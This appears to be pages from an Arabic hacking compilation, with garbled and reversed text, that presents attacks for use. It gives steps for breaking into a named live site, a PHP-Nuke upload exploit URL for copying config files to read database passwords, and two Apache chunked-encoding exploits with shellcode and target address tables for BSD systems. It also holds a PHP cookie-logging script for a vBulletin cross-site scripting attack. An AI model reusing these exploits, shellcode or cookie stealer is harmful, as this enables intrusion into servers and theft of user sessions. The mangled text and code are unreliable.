ﺘﺎﺟﻪ ﻫﻲاداهﺑﺴﯿﻄﻪ ﯾﻘﺪﻣﻬﺎﻟﻨﺎ وﻧﺪوز ٩٨ﻮاﻧﻨﻲ ﻻاﻋﻠﻢانﻛﺎﻧ ﺖاﻟﻨﺴ ﺦاﻻ ﺧ ﺮىﺗﻤ
ﯾﺎأ ﺧﻮانﻛ ﻞ ﻣﺎﻧ ﺤ
ﻣﺜ ﻞ ﻫﺬهﻟﺨﺎ ﺻﯿﻪام ﻻ ﻻﻧﻨﻲاﻋﻤ ﻞ ﻋﻠﻰ ﻧﻈﺎﻣﯿﻦﻓﻘﻂﻟﯿﻨﻜ ﺲ ﻣﺎﻧﺪرﯾﻚ ووﻧﺪوز٩٨ﻓﻘﻂ :
ﺘ ﺮا ق
ﺘﻜﻮناداﺗﻨﺎاﻟﻤﻬﻤﻪﻟﻼ ﺧ
ﺘﻲ ﺳ
Add Web Folderﺣﯿﺚﻫﻲاﻟ
http://hostname.com/
ﻗﻊ وﻟﯿ ﺲاﻻﺳﻢ
ﺘﺒﻪﻗﻠﻨﺎاﯾﺒﻲاﻟﻤﻮ
ﻗﻊاﻧﺣﯿﺚان hostnameﻫﻮاﯾﺒﻲاﻟﻤﻮ
ﻗﻊ وﻫﻨﺎك ﺪروسﻛﺜﯿ ﺮهﺑﺨﺼﻮ ص ﻫﺬااﻟﻤﻮ ﺿﻮ ع ﻮاﻟﺠﻤﯿﻊ ﯾﻌ ﺮ فﻛﯿ ﻒ ﯾﺨ ﺮجاﻻﯾﺒﻲﺗﺒﻊاﻟﻤﻮ
٢ ٠٩
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﻗﻊ
ﻗﻊ ﻫﻨﺎك وﻣﺴﻤﻰﺗ ﺤ ﺖاﯾﺒﻲ ﺎﻟﻤﻮ
ﻋﻨﺪﻫﺎﺗﺬﻫﺐاﻟﻰا ل : Web Folderﻮﺗﺠﺪ ﻣﻠ ﻒاﻟﻤﻮ
ﺘﻄﺒﯿ ﻖ :
ﻗﻊا ﺧ ﺮﻟﻠ
ﻣﻮ
212.199.43.84http://www.israwine.co.il/
٢١ ٠
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$$
Arab VieruZ :اﻟﻜﺎﺗﺐ
$$$$$$$$$$$$$$$
: ﺎﻟﺸ ﺮ حﺑﺎﻷﻧﻘﻠﯿﺰﯾﺔ
:Found by
LucisFero and supergate
twlc/.
Summary
it allows you to 'cp' any file on ...This time the bug is really dangerous
...or even upload files ...the box
dSystems Affecte
all the versions ARE vulnerable
is ٥٫٢is ok while the final .i wonder why a released c) '١RC ٥٫٠except '
(bugged
Explanation
Do you need sql password?
١=php?upload.admin/net.server.www//:http
config=elifresu&/images/=txt&wdir.hacked=php&file_name.config=elif&
txt .hacked=php&userfile_name.
٢١ ١
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
Solution
cause we wanted to remove the file manager ...we erased the function
-files use FTP to upload- ...anyway but i suggest you to do the same
:conclusions
this software is used by thousands of ...yet another bug of php nuke
i hope that this time the (we run something based on it too) ...people
as i said before just !author will reply soon and will release a patch too
be a script kiddie or we simply WONT post anymore this dont try to
Prolly the funny thing is that who first discovered .kind of advisories
so i ...hours before didnt knew php ٢...the bug was LucisFero that
.fear him and you should too (supergate)
:posted at
٢١ ٢
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
remember that trojans are ...bugs, ideas, insults, cool girls)tacts con
:(null/dev/directed to
net.lucisfero@twlc
net.supergate@twlc
eof
-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
=-=-=-=-=-=-=-=-=-=-=-=
:اﻟﺨﻄﺄاﻟﺒ ﺮﻣﺠﻲ
؛(EMANELIF_TPIRCS$)dirname = ridesab$
؛٢٠ = swortxet$
؛٨٥ = sloctxet$
؛(FLES_PHP$)dirname = ridu$
؛"/"=ridw$ (ridw$!)if
؛"FileManager"=po$ (lecnac$)if
} (daolpu$)if
؛(eman_elifresu$.ridw$.ridesab$،elifresu$)copy
؛"ridw$ <-- eman_elifresu$ ".DEDAOLPU_."" = noitcatsal$
WE TOTALY !GMO <-------------------------------------This need a rewrite //
AGREEEEEEEE lmao
؛("php.header")include//
؛(elifplh$)GraphicAdmin//
؛()html_header//
؛()displaydir//
؛
"/"=٢ridw$
؛(٢ridw$ . ridesab$)chdir
؛()eCloseTabl//
؛("php.footer")include//
٢١ ٣
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
؛
("FileManager=php?op.admin :Location")Header
exit;
{
-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
=-=-=-=-=-=-=-=-=-=-=-=
:اﻟﺜﻐ ﺮة
١=php?upload.admin/net.server.www//:http
config=elifresu&/images/=txt&wdir.hacked=php&file_name.config=elif&
txt.hacked=erfile_namephp&us.
-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
=-=-=-=-=-=-=-=-=-=-=-=
ﺘﻌﺪﯾ ﻞ
اﻟﺜﻐ ﺮةﺑﻌﺪاﻟ
١=php?upload.admin/net.server.www//:http
php.config=elifresu&/=txt&wdir.ultramode=php&file_name.config=elif&
txt.ultramode=eman_elifresu&
-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
=-=-=-=-=-=-=-=-=-=-=-=
:ﻋﻤ ﻞاﻟﺜﻐ ﺮة
ﺘﺎجﺗ ﺤﻤﯿ ﻞ
ﻟﻦﺗ ﺤtxt.ultramodeاﻟﻰاﻟﻤﻠ ﻒاﻟﻨﺼﻲاﻟﻤﻮﺟﻮدphp.config = ﻃﺒﻊ ﻣﻠ ﻒاﻟﻜﻮﻧﻔﯿ ﺞ-
ﻣﻠ ﻒ ﻧﺼﻲﻟﻄﺒﻊاﻟﻤﻠ ﻒ
ﻗﻊاﻵن ﺘ ﺤﻤﯿ ﻞاﻟﻰاﻟﻤﻮ
ﻗﻊﺗﻤﻨﻊاﻟ
( وﻷنﺑﻌ ﺾاﻟﻤﻮا-: ﺘ ﺞ
ﺘﻨ
ﻛﻤﺎ ﻫﻮ ﻣﻮﺟﻮدﺑﺎﻟﺸ ﺮ حاﻷﻧﻘﻠﯿﺰي ﯾﻌﻨﻲﻓﻜ ﺮ واﺳ
txt.ultramode/com.server//:http ﻣﺎ ﻋﻠﯿﻚ ﺳﻮىاﻟﺪ ﺧﻮ لاﻟﻰ
-=ﻗﻊﺘﺎﺑﻊﻟﻘﺎﻋﺪةﺑﯿﺎﻧﺎ تاﻟﻤﻮ
ﺘﺠﺪﺑﺎس واﻟﯿﻮزراﻟوﺳ
ﻣﻼ ﺣﻈﺎ ت
ﻗﻪ
ﺘ ﺮا
ﻗﻊاﻟ ﺮادا ﺧ
ﺑﺎﻟﻤﻮcom.server ﺑﺪ ل-١
٢١ ٤
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$$$$$$$$
ﻗﻊ angels-bytes
ﻣﻨﻘﻮ ل ﻣﻦ ﻣﻮ
$$$$$$$$$$$$$$$$$$$$$
ﺘﺜﻤﺎرﯾﻦ
ﺘﺜﻤﺎر ﻫﺬهاﻟﺜﻐ ﺮهﻓﺴﻮ فأ ﺿﻊﻟﻜﻢأﻓ ﻀ ﻞأﺳ
ﺄﻣﺎﻟﻤﺴﺄﻟﺔﺈﺳ
٢١ ٥
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
#define REP_POPULATOR 24
#define REP_RET_ADDR 6
#define REP_ZERO 36
#define REP_SHELLCODE 24
#define NOPCOUNT 1024
#define SHELLCODE_LOCALPORT_OFF 30
char shellcode[] =
\\\" \\\\x89\\\\xe2\\\\x83\\\\xec\\\\x10\\\\x6a\\\\x10\
\\\x54\\\\x52\\\\x6a\\\\x00\\\\x6a\\\\x00\\\\xb8\\
\\x1f\\\"
\\\" \\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\x80\\\\x7a\
\\\x01\\\\x02\\\\x75\\\\x0b\\\\x66\\\\x81\\\\x7a\\
\\x02\\\"
\\\" \\\\x42\\\\x41\\\\x75\\\\x03\\\\xeb\\\\x0f\\\\x90\
\\\xff\\\\x44\\\\x24\\\\x04\\\\x81\\\\x7c\\\\x24\\
\\x04\\\"
\\\" \\\\x00\\\\x01\\\\x00\\\\x00\\\\x75\\\\xda\\\\xc7\
\\\x44\\\\x24\\\\x08\\\\x00\\\\x00\\\\x00\\\\x00\\
\\xb8\\\"
\\\" \\\\x5a\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\xff\
\\\x44\\\\x24\\\\x08\\\\x83\\\\x7c\\\\x24\\\\x08\\
\\x03\\\"
\\\" \\\\x75\\\\xee\\\\x68\\\\x0b\\\\x6f\\\\x6b\\\\x0b\
٢١ ٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
\\\x81\\\\x34\\\\x24\\\\x01\\\\x00\\\\x00\\\\x01\\
\\x89\\\"
\\\" \\\\xe2\\\\x6a\\\\x04\\\\x52\\\\x6a\\\\x01\\\\x6a\
\\\x00\\\\xb8\\\\x04\\\\x00\\\\x00\\\\x00\\\\xcd\\
\\x80\\\"
\\\" \\\\x68\\\\x2f\\\\x73\\\\x68\\\\x00\\\\x68\\\\x2f\
\\\x62\\\\x69\\\\x6e\\\\x89\\\\xe2\\\\x31\\\\xc0\\
\\x50\\\"
\\\" \\\\x52\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x52\\\\x50\
\\\xb8\\\\x3b\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\
\\xcc\\\";
struct {
char *type;
u_long retaddr;
} targets[] = { // hehe, yes theo, that say OpenBSD here!
{ \\\"OpenBSD 3.0 x86 / Apache 1.3.20\\\", 0xcf92f },
{ \\\"OpenBSD 3.0 x86 / Apache 1.3.22\\\", 0x8f0aa },
{ \\\"OpenBSD 3.0 x86 / Apache 1.3.24\\\", 0x90600 },
{ \\\"OpenBSD 3.1 x86 / Apache 1.3.20\\\", 0x8f2a6 },
{ \\\"OpenBSD 3.1 x86 / Apache 1.3.23\\\", 0x90600 },
{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24\\\", 0x9011a },
{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24 #2\\\", 0x932ae },
};
if(argc != 3) {
printf(\\\"Usage: %s \\\\n\\\", argv[0]);
printf(\\\" Using targets:\\\\t./apache-scalp 3 127.0.0.1:8080\\\\n\\\");
printf(\\\" Using bruteforce:\\\\t./apache-scalp 0x8f000
٢١ ٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
127.0.0.1:8080\\\\n\\\");
printf(\\\"\\\\n--- --- - Potential targets list - --- ----\\\\n\\\");
printf(\\\"Target ID / Target specification\\\\n\\\");
for(i = 0; i < sizeof(targets)/8; i++)
printf(\\\"\\\\t%d / %s\\\\n\\\", i, targets[i].type);
return -1;
}
srand(getpid());
signal(SIGPIPE, SIG_IGN);
for(owned = 0, progress = 0;;retaddr += RET_ADDR_INC) {
٢١ ٨
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
fflush(stdout);
if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) {
perror(\\\"connect()\\\");
exit(1);
}
if(!progress)
printf(\\\"connected!\\\\n\\\");
lport = ntohs(from.sin_port);
shellcode[SHELLCODE_LOCALPORT_OFF + 1] = lport & 0xff;
shellcode[SHELLCODE_LOCALPORT_OFF + 0] = (lport >> 8) & 0xff;
٢١ ٩
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
PUT_STRING(\\\": \\\");
for (j = 0; j < REP_RET_ADDR; j++) {
*p++ = retaddr & 0xff;
*p++ = (retaddr >> 8) & 0xff;
*p++ = (retaddr >> 16) & 0xff;
*p++ = (retaddr >> 24) & 0xff;
}
PUT_BYTES(REP_ZERO, 0);
PUT_STRING(\\\"\\\\r\\\\n\\\");
}
PUT_STRING(\\\"Transfer-Encoding: chunked\\\\r\\\\n\\\");
snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", PADSIZE_2);
PUT_STRING(buf);
PUT_BYTES(PADSIZE_2, PADDING_2);
snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\",
MEMCPY_s1_OWADDR_DELTA);
PUT_STRING(buf);
progress++;
if((progress%70) == 0)
progress = 1;
if(progress == 1) {
memset(buf, 0, sizeof(buf));
sprintf(buf, \\\"\\\\r[*] Currently using retaddr 0x%lx, length %u, localport
%u\\\",
retaddr, (unsigned int)(p - expbuf), lport);
memset(buf + strlen(buf), \\' \\', 74 - strlen(buf));
puts(buf);
if(bruteforce)
putchar(\\';\\');
}
else
putchar((rand()%2)? \\'P\\': \\'p\\');
fflush(stdout);
while (1) {
٢٢٠
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
fd_set fds;
int n;
struct timeval tv;
tv.tv_sec = EXPLOIT_TIMEOUT;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(sock, &fds);
memset(buf, 0, sizeof(buf));
if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) {
if(FD_ISSET(sock, &fds)) {
if((n = read(sock, buf, sizeof(buf) - 1)) <= 0)
break;
if(FD_ISSET(0, &fds)) {
if((n = read(0, buf, sizeof(buf) - 1)) < 0)
exit(1);
if(!owned)
break;
}
free(expbuf);
٢٢١
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
close(sock);
if(owned)
return 0;
if(!bruteforce) {
fprintf(stderr, \\\"Ooops.. hehehe!\\\\n\\\");
return -1;
}
}
return 0;
}
Exploit #2:
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#ifdef __linux__
#include
#endif
#define PADSIZE_1 4
#define PADSIZE_2 5
#define PADSIZE_3 7
٢٢٢
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
#define REP_POPULATOR 24
#define REP_SHELLCODE 24
#define NOPCOUNT 1024
char shellcode[] =
\\\" \\\\x68\\\\x47\\\\x47\\\\x47\\\\x47\\\\x89\\\\xe3\
\\\x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\xc6\\
\\x04\\\\x24\\\"
\\\" \\\\x04\\\\x53\\\\x50\\\\x50\\\\x31\\\\xd2\\\\x31\
\\\xc9\\\\xb1\\\\x80\\\\xc1\\\\xe1\\\\x18\\\\xd1\\
\\xea\\\\x31\\\"
\\\" \\\\xc0\\\\xb0\\\\x85\\\\xcd\\\\x80\\\\x72\\\\x02\
\\\x09\\\\xca\\\\xff\\\\x44\\\\x24\\\\x04\\\\x80\\
\\x7c\\\\x24\\\"
\\\" \\\\x04\\\\x20\\\\x75\\\\xe9\\\\x31\\\\xc0\\\\x89\
\\\x44\\\\x24\\\\x04\\\\xc6\\\\x44\\\\x24\\\\x04\\
\\x20\\\\x89\\\"
\\\" \\\\x64\\\\x24\\\\x08\\\\x89\\\\x44\\\\x24\\\\x0c\
\\\x89\\\\x44\\\\x24\\\\x10\\\\x89\\\\x44\\\\x24\\
\\x14\\\\x89\\\"
\\\" \\\\x54\\\\x24\\\\x18\\\\x8b\\\\x54\\\\x24\\\\x18\
\\\x89\\\\x14\\\\x24\\\\x31\\\\xc0\\\\xb0\\\\x5d\\
\\xcd\\\\x80\\\"
\\\" \\\\x31\\\\xc9\\\\xd1\\\\x2c\\\\x24\\\\x73\\\\x27\
\\\x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\xff\\
\\x04\\\\x24\\\"
\\\" \\\\x54\\\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\
\\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\\\\x51\\
\\x50\\\\xb0\\\"
\\\" \\\\x1d\\\\xcd\\\\x80\\\\x58\\\\x58\\\\x58\\\\x58\
\\\x58\\\\x3c\\\\x4f\\\\x74\\\\x0b\\\\x58\\\\x58\\
\\x41\\\\x80\\\"
\\\" \\\\xf9\\\\x20\\\\x75\\\\xce\\\\xeb\\\\xbd\\\\x90\
\\\x31\\\\xc0\\\\x50\\\\x51\\\\x50\\\\x31\\\\xc0\\
٢٢٣
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
\\xb0\\\\x5a\\\"
\\\" \\\\xcd\\\\x80\\\\xff\\\\x44\\\\x24\\\\x08\\\\x80\
\\\x7c\\\\x24\\\\x08\\\\x03\\\\x75\\\\xef\\\\x31\\
\\xc0\\\\x50\\\"
\\\" \\\\xc6\\\\x04\\\\x24\\\\x0b\\\\x80\\\\x34\\\\x24\
\\\x01\\\\x68\\\\x42\\\\x4c\\\\x45\\\\x2a\\\\x68\\
\\x2a\\\\x47\\\"
\\\" \\\\x4f\\\\x42\\\\x89\\\\xe3\\\\xb0\\\\x09\\\\x50\
\\\x53\\\\xb0\\\\x01\\\\x50\\\\x50\\\\xb0\\\\x04\\
\\xcd\\\\x80\\\"
\\\" \\\\x31\\\\xc0\\\\x50\\\\x68\\\\x6e\\\\x2f\\\\x73\
\\\x68\\\\x68\\\\x2f\\\\x2f\\\\x62\\\\x69\\\\x89\\
\\xe3\\\\x50\\\"
\\\" \\\\x53\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x53\\\\x50\
\\\xb0\\\\x3b\\\\xcd\\\\x80\\\\xcc\\\";
;
struct {
char *type; /* description for newbie penetrator */
int delta; /* delta thingie! */
u_long retaddr; /* return address */
int repretaddr; /* we repeat retaddr thiz many times in the buffer */
int repzero; /* and \\\\0\\'z this many times */
} targets[] = { // hehe, yes theo, that say OpenBSD here!
{ \\\"FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)\\\", -150, 0x80f3a00, 6, 36 },
{ \\\"FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)\\\", -150, 0x80a7975, 6, 36 },
{ \\\"OpenBSD 3.0 x86 / Apache 1.3.20\\\", -146, 0xcfa00, 6, 36 },
{ \\\"OpenBSD 3.0 x86 / Apache 1.3.22\\\", -146, 0x8f0aa, 6, 36 },
{ \\\"OpenBSD 3.0 x86 / Apache 1.3.24\\\", -146, 0x90600, 6, 36 },
{ \\\"OpenBSD 3.0 x86 / Apache 1.3.24 #2\\\", -146, 0x98a00, 6, 36 },
{ \\\"OpenBSD 3.1 x86 / Apache 1.3.20\\\", -146, 0x8f2a6, 6, 36 },
{ \\\"OpenBSD 3.1 x86 / Apache 1.3.23\\\", -146, 0x90600, 6, 36 },
{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24\\\", -146, 0x9011a, 6, 36 },
{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24 #2\\\", -146, 0x932ae, 6, 36 },
{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24 PHP 4.2.1\\\", -146, 0x1d7a00, 6,
36 },
{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.12 (Unix)\\\", -90, 0x80eda00, 5, 42 },
{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.20 (Unix)\\\", -90, 0x80efa00, 5, 42 },
{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.22 (Unix)\\\", -90, 0x80efa00, 5, 42 },
{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.23 (Unix)\\\", -90, 0x80efa00, 5, 42 },
{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.24 (Unix)\\\", -90, 0x80efa00, 5, 42 },
}, victim;
٢٢٤
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
void usage(void) {
int i;
exit(1);
}
٢٢٥
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
if(argc < 4)
usage();
bruteforce = 0;
memset(&victim, 0, sizeof(victim));
while((i = getopt(argc, argv, \\\"t:b:d:h:w:c:r:z:o:\\\")) != -1) {
switch(i) {
/* required stuff */
case \\'h\\':
hostp = strtok(optarg, \\\":\\\");
if((portp = strtok(NULL, \\\":\\\")) == NULL)
portp = \\\"80\\\";
break;
/* predefined targets */
case \\'t\\':
if(atoi(optarg) >= sizeof(targets)/sizeof(victim)) {
printf(\\\"Invalid target\\\\n\\\");
return -1;
}
/* bruteforce! */
case \\'b\\':
bruteforce++;
victim.type = \\\"Custom target\\\";
victim.retaddr = strtoul(optarg, NULL, 16);
printf(\\\"Using 0x%lx as the baseadress while bruteforcing..\\\\n\\\",
٢٢٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
victim.retaddr);
break;
case \\'d\\':
victim.delta = atoi(optarg);
printf(\\\"Using %d as delta\\\\n\\\", victim.delta);
break;
case \\'r\\':
victim.repretaddr = atoi(optarg);
printf(\\\"Repeating the return address %d times\\\\n\\\",
victim.repretaddr);
break;
case \\'z\\':
victim.repzero = atoi(optarg);
printf(\\\"Number of zeroes will be %d\\\\n\\\", victim.repzero);
break;
case \\'o\\':
bruteforce++;
switch(*optarg) {
case \\'f\\':
victim.type = \\\"FreeBSD\\\";
victim.retaddr = 0x80a0000;
victim.delta = -150;
victim.repretaddr = 6;
victim.repzero = 36;
break;
case \\'o\\':
victim.type = \\\"OpenBSD\\\";
victim.retaddr = 0x80000;
victim.delta = -146;
victim.repretaddr = 6;
victim.repzero = 36;
break;
case \\'n\\':
victim.type = \\\"NetBSD\\\";
victim.retaddr = 0x080e0000;
victim.delta = -90;
٢٢٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
victim.repretaddr = 5;
victim.repzero = 42;
break;
default:
printf(\\\"[-] Better luck next time!\\\\n\\\");
break;
}
break;
/* optional stuff */
case \\'w\\':
sc_timeout = atoi(optarg);
printf(\\\"Waiting maximum %d seconds for replies from
shellcode\\\\n\\\", sc_timeout);
break;
case \\'c\\':
cmdz = optarg;
break;
default:
usage();
break;
}
}
٢٢٨
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
printf(\\\"%s\\\\n\\\", inet_ntoa(ia));
srand(getpid());
signal(SIGPIPE, SIG_IGN);
for(owned = 0, progress = 0;;victim.retaddr += RET_ADDR_INC) {
/* skip invalid return adresses */
if(memchr(&victim.retaddr, 0x0a, 4) || memchr(&victim.retaddr, 0x0d, 4))
continue;
fflush(stdout);
if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) {
perror(\\\"connect()\\\");
exit(1);
}
if(!progress)
printf(\\\"connected!\\\\n\\\");
٢٢٩
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
PUT_BYTES(victim.repzero, 0);
PUT_STRING(\\\"\\\\r\\\\n\\\");
}
PUT_STRING(\\\"Transfer-Encoding: chunked\\\\r\\\\n\\\");
snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", PADSIZE_2);
PUT_STRING(buf);
PUT_BYTES(PADSIZE_2, PADDING_2);
snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", victim.delta);
PUT_STRING(buf);
if(!shown_length) {
printf(\\\"[*] Exploit output is %u bytes\\\\n\\\", (unsigned int)(p -
expbuf));
shown_length = 1;
}
progress++;
if((progress%70) == 0)
progress = 1;
if(progress == 1) {
printf(\\\"\\\\r[*] Currently using retaddr 0x%lx\\\", victim.retaddr);
for(i = 0; i < 40; i ++)
٢ ٣٠
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
printf(\\\" \\\");
printf(\\\"\\\\n\\\");
if(bruteforce)
putchar(\\';\\');
}
else
putchar(((rand()>>8)%2)? \\'P\\': \\'p\\');
fflush(stdout);
responses = 0;
while (1) {
fd_set fds;
int n;
struct timeval tv;
tv.tv_sec = sc_timeout;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(sock, &fds);
memset(buf, 0, sizeof(buf));
if(select(sock + 1, &fds, NULL, NULL, owned? NULL : &tv) > 0) {
if(FD_ISSET(sock, &fds)) {
if((n = read(sock, buf, sizeof(buf) - 1)) < 0)
break;
if(n >= 1)
{
if(!owned)
{
for(i = 0; i < n; i ++)
if(buf[i] == \\'G\\')
responses ++;
else
responses = 0;
if(responses >= 2)
{
owned = 1;
write(sock, \\\"O\\\", 1);
٢ ٣١
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
if(FD_ISSET(0, &fds)) {
if((n = read(0, buf, sizeof(buf) - 1)) < 0)
exit(1);
if(!owned)
break;
}
free(expbuf);
close(sock);
if(owned)
return 0;
if(!bruteforce) {
fprintf(stderr, \\\"Ooops.. hehehe!\\\\n\\\");
return -1;
}
}
return 0;
}
٢ ٣٢
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
.....
٢ ٣٣
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$
ـﻮ ل
ـﻘ
ــﻨ
ـ
ﻣ
$$$$$$
---------
ﻣﻘﺪﻣﺔ :
---------
ـ vBulletinﺘ ﺮا قاﻟ
اﻟﻤﻮ ﺿﻮ ع :ا ﺧ
ﺘ ﺮﻧ ﺖ )اﻛﺴﺒﻠﻮرر( .
ﺘﺼﻔﺢاﻧ
ﺘﻄﻠﺒﺎ ت ) WebServer :ﺗ ﺮﻛﯿﺐ ﺳﯿ ﺮﻓ ﺮ ﻋﻠﻰ ﺟﻬﺎزكاﻟﺸﺨﺼﻲ( +ﻣ اﻟﻤ
ﺘﻮﺳﻂ ﺘﻮى :ﻣاﻟﻤﺴ
ﺘﺪﯾﺎ ت .
ـ vBulletinﻓﻘﻂ !! ﯾﻤﻜﻦانﺗﺠ ﺮﺑﻬﺎ ﻋﻠﻰاﻧﻮا عا ﺧ ﺮى ﻣﻦاﻟﻤﻨ
ﻣﻼ ﺣﻈﺔ :ﻫﺬهاﻟﻄ ﺮﯾﻘﺔﻟﺴ ﺖﻟﻠ
----------
اﻟﺜﻐ ﺮة :
----------
٢ ٣٤
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
------------
اﻟ ﺤ ﻞ -:
-----------
٢ ٣٥
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$$
ـﺮ
ــ
ـ<>ـﺪ
ـ
ـ<>ـ
ـ
ـاﻟ:اﻟﻜﺎﺗﺐ
$$$$$$$$$$$$$$$$
vBulletin 2.2.9....ﺘﺪﯾﺎ ت
ﻫﺬهاﻟﺜﻐ ﺮة ﺧﻄﯿ ﺮة ﺟﺪا وﺗﺆديﺑ ﺤﺎﯾﺔاﻟﻤﻨ
:ﺘﺎﻟﻲ
ﺎﻟﻤﻬﻢ ﺷ ﺮ ﺣﻬﺎﻛﺎﻟ
// Variables:
$LogFile = "Cookies.Log";
// Functions:
/*
If ($HTTP_GET_VARS['Action'] = "Log") {
$Header = "<!--";
$Footer = "--->";
}
Else {
$Header = "";
$Footer = "";
}
Print ($Header);
*/
Print ("<Title>vBulletin XSS Injection Vulnerability: Exploit</Title>");
Print ("<Pre>");
Print ("<Center>");
Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
Print ("Coded By: <B><A
Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp.IC</A></B><Hr
Width=\"20%\">");
/*
٢ ٣٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
Print ($Footer);
*/
Switch ($HTTP_GET_VARS['Action']) {
Case "Log":
$Data = $HTTP_GET_VARS['Cookie'];
$Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen (DecHex
(MD5 (NULL))))));
$Log = FOpen ($LogFile, "a+");
FWrite ($Log, Trim ($Data) . "\n");
FClose ($Log);
Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0; URL=" .
$HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
Break;
Case "List":
If (!File_Exists ($LogFile) || !In_Array ($Records)) {
Print ("<Br><Br><B>There are No Records</B></Center></Pre>");
Exit ();
}
Else {
Print ("</Center></Pre>");
$Records = Array_UniQue (File ($LogFile));
Print ("<Pre>");
Print ("<B>.:: Statics</B>\n");
Print ("\n");
Print ("o Logged Records : <B>" . Count (File ($LogFile)) . "</B>\n");
Print ("o Listed Records : <B>" . Count ($Records) . " </B>[Not
Counting Duplicates]\n");
Print ("\n");
٢ ٣٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
Print ("</Pre>");
Break;
Case "Delete":
@UnLink ($LogFile);
Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>") Or Die
("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre>");
Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" .
$HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
Break;
}
?>
